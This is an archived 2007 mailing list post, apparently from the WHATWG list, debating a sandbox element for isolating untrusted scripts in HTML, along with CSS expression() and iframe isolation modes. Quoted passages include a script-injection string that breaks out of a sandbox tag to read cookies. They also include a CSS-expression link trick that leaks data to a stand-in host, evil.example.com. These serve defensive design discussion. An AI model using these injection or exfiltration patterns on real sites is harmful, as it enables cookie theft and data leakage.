- From: Alexey Feldgendler <alexey@feldgendler.ru>
- Date: Wed, 09 May 2007 02:05:19 +0200
On Tue, 08 May 2007 05:50:38 +0200, Ian Hickson <ian at hixie.ch> wrote: >> 1. The entire thing has to degrade SAFELY in existing browsers. With >> your approach, any existing browser will just ignore the unknown >> "sandbox" attribute, effectively allowing the script to do anything. >> This is not acceptable. > This probably depends on the use cases in question. For some use cases, > the status quo is in fact the script running with full privileges, so > while not being ideal, it is indeed acceptable; in other cases, you > wouldn't want scripts to run at all if they weren't limited in some way. A security feature, by definition, protects the users from a certain class of attacks. An attack needs to be only successful in one browser to do harm. For example, a malicious advertising script which actually steals passwords entered by users on the host page is dangerous enough even if the attacker only succeeds in stealing passwords of just a fraction of the users. I can't really imagine a scenario in which sandbox restrictions could be somehow considered optional. Wherever there is need for such restrictions, it's unacceptable to run the script without them implemented. > This is unfortunately far too complicated. It basically duplicates most > of > the <iframe> security and DOM model, which itself has been a big source > of > bugs over the years. Yes, that's the idea (about the duplication, not about the bugs). > Actually the origin-checking in browsers is simpler than that. It only > happens at certain very specific places, namely the Window interface > entry > points. If we want to add a security model here, it has to be at the > Window level, which basically means a new browsing context. I should probably have named the element <browsingcontext>. The key differences from <iframe> are: 1. Doesn't require loading of a separate document via a separate HTTP request, and without the ugliness of data: URIs. If there was some "inline" version of <iframe>, such as <iframe>content</iframe>, that would be just fine. 2. Implements the security barrier even though the inner content doesn't come from a different domain. <iframe> would require a separate domain for that. 3. The security barrier is asymmetric, i.e. the outer scripts have access to the inner content, but not the other way round. >> Of course, there is a lot more to think and talk about. I suppose there >> are going to be problems with particular buggy implementations of >> sandboxing and exploits specifically targetted at holes in such >> implementations. I suspect that web application authors and site >> administrators will be hesitant to allow user scripting even in >> sandboxes because of the possible browser bugs. > Because of this, we really want to make sure we leverage as much of the > existing infrastructure as possible. I'm worried that the DOMSandbox > idea, > with its "fake" documents, etc, introduces too much complexity. You're drawing parallels between sandboxing and <iframe>. If the shortcomings of <iframe> listed above can be alleviated, it would be just fine. >> I propose to define the notion of "side effect free script". All >> browsers which allow scripts in declarations like CSS should only allow >> side effect free scripts in such places. >> 2. It can call any non-native function, but the same restrictions apply. > So it can get hold of data that the rest of the page has created, or is > storing in its temporary variables (e.g. it can get hold of your calendar > data if you're looking at an online calendar application). No, it's impossible to store any data permanently in a thread which is in SEF mode. Only locals can be assigned, and they aren't going to last longer than the thread anyway. > With the above you could still do something like: > > <a style="display: expression(...)" > href="http://evil.example.com?a">a</a> > <a style="display: expression(...)" > href="http://evil.example.com?b">b</a> > > ...where the first "..." script returns 'none' to convey one piece of > information and 'block' to convey another, and the second is the reverse; > the user who clicks on the link then exposes the bit of information the > script was trying to steal. I'm sure there are more powerful attacks as > well, e.g. using href=javascript: to return an HTML page with script. Even easier: background: url(expression(...)). I see your point. > In short, the complexity is high, as is the risk that it isn't > comprehensive. Also, it seems to me that most scripts want to do > something > more fancy. For example, a calendar widget will want to talk to its > server, render new DOMs, interact with the user, etc. What's the use case > for these scripts? Are they common enough to warrant their own security > model? It's not for most scripts. It's basically only for expression() in CSS, which is generally a good thing, if only it can be made impossible to do use it for bad purposes. And this whole SEF idea is not really relevant to sandboxing. >> Frames are a terrible solution. The content is after all a part of the >> page it's hosted in, but we want to sandbox it to make sure it can't do >> any harm. >> >> Let's say we'd like to sandbox anonymous user-contributed comments on a >> blog, but not comments from logged in users. That would require all >> anonymous comments to be placed within an iframe. For 100 anonymous >> comments, that's 100 iframes on a single web page. Don't tell me that's >> an elegant solution. > Why not? Or rather, why is a 100 <sandbox> frames (or whatever) better? 1. Because it doesn't require 100 HTTP requests to load the page. 2. Because it doesn't require a separate domain to serve the iframe content from. These two are major, and there are also several minor issues (some sizing problems with iframes, as pointed out by Charles; stylesheet propagation into sandboxes; strict symmetry of restrictions on iframes). > We can't do something like this: > > <body> > <p>Hello, you said: > <sandbox>Hello World</sandbox> > </p> > </body> > > ...because nothing stops the user from inserting "</sandbox>" into the > string -- e.g. if the user tried to insert > "</sandbox><script>alert(window.cookie)</script>" the result would be: All attempts to treat user-submitted HTML as a string are doomed to having such vulnerabilities. <sandbox> alone doesn't add much to this problem. Just look at how complex is the HTML sanitizer in LiveJournal which allows some user-submitted markup but not all. The only ultimate solution here is to parse the user-submitted HTML with an HTML5 parser and reserialize it. The string "</sandbox><script>alert(window.cookie)</script>" would parse into one <script> element with a text node inside (stray </sandbox> at the start gets ignored), and reserialize as "<script>alert(window.cookie)</script>". That's the only reasonable way (apart from completely escaping all <>"& characters) to include ANY user-submitted string into generated HTML, with or without <sandbox>. > The sanest way I can see of limiting scripting is to give it its own > browsing context (aka scripting context, or global scope). Anything short > of this would make the security model overly complicated -- the security > model is what we want to keep at its simplest, as I've said several times > in this e-mail. <sandbox> would indeed be one, just with the content supplied inline. > This basically implies an <iframe>, again possibly with the data in a > data: URI, and combined with a way to ioslate the content in the <iframe> > from the content of the parent browsing context: > > <iframe > src="data:text/html;base64,PHA%2BVGhpcyBpcyBteSBzYW1wbGUgbWFya3VwITwvcD4%3D" > isolate-scripts > ></iframe> data: URIs are maybe appropriate for a small list-bullet PNG, but not for a blog entry or comment. They are ugly and impossible to read and write without machine conversion. Any element that lets you write the HTML content inside, be it <iframe> or <sandbox> or something else, would be OK. > The names above are a bit long; here's a summary of what the four modes > could be: > > seamless - if present, styles cascade through the browsing context > boundary; ignored if the origin doesn't match the parent's. > > noscript - disables all scripts in the embedded page > > isolate - make the origin of the file not match the parent's, > regardless of the real origins > > restrict - disable certain APIs in the browsing context These make a nice list of toggle attributes for the <sandbox> element. -- Alexey Feldgendler <alexey at feldgendler.ru> [ICQ: 115226275] http://feldgendler.livejournal.com
Received on Tuesday, 8 May 2007 17:05:19 UTC